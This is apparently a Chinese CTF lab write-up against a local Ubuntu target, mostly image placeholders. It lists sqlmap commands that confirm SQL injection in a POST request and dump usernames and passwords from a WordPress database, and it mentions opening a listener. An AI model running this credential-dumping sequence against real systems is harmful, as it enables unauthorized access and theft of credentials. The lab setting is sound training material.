CTF实战_007

靶机环境

链接:https://pan.baidu.com/s/1WcN1jyZfGU4BnGr3V6UpWw 提取码:hgka
kali 攻击机IP 192.168.1.7
ubuntu 靶机 IP 192.168.1.6

信息探测CTF实战_007_第1张图片

CTF实战_007_第2张图片
CTF实战_007_第3张图片
CTF实战_007_第4张图片
CTF实战_007_第5张图片
CTF实战_007_第6张图片
CTF实战_007_第7张图片
CTF实战_007_第8张图片

sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
CTF实战_007_第9张图片
sqlmap -r request.raw --level 5 --risk 3 -D “wordpress8080” --batch
CTF实战_007_第10张图片
sqlmap -r request.raw --level 5 --risk 3 -D “wordpress8080” -T “users” --columns --batch
CTF实战_007_第11张图片
sqlmap -r request.raw --level 5 --risk 3 -D “wordpress8080” -T “users” -C “password,username” --dump --batch

CTF实战_007_第12张图片

sqlmap post注入点

sqlmap -r request.raw --level 5 --risk 3
# 检测是否存在注入
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
# 查看所有数据库
sqlmap -r request.raw --level 5 --risk 3 -D "wordpress8080" --batch
# 查看库中表
sqlmap -r request.raw --level 5 --risk 3 -D "wordpress8080" -T "users" --columns --batch
#查看表中字段
sqlmap -r request.raw --level 5 --risk 3 -D "wordpress8080" -T "users" -C "password,username" --dump --batch
#查看字段的值

CTF实战_007_第13张图片
在这里插入图片描述

CTF实战_007_第14张图片
开启端口监听
在这里插入图片描述在这里插入图片描述
CTF实战_007_第15张图片
CTF实战_007_第16张图片
CTF实战_007_第17张图片
在这里插入图片描述
在这里插入图片描述
CTF实战_007_第18张图片
CTF实战_007_第19张图片

发现密码 就是网站登录密码 所以添加发现密码到字典很必要

只要让用户输入数据的并提交的地方就可能存在注入点

漏洞扫描器不是万能的,只可以做一个参考

你可能感兴趣的:(随笔(备份))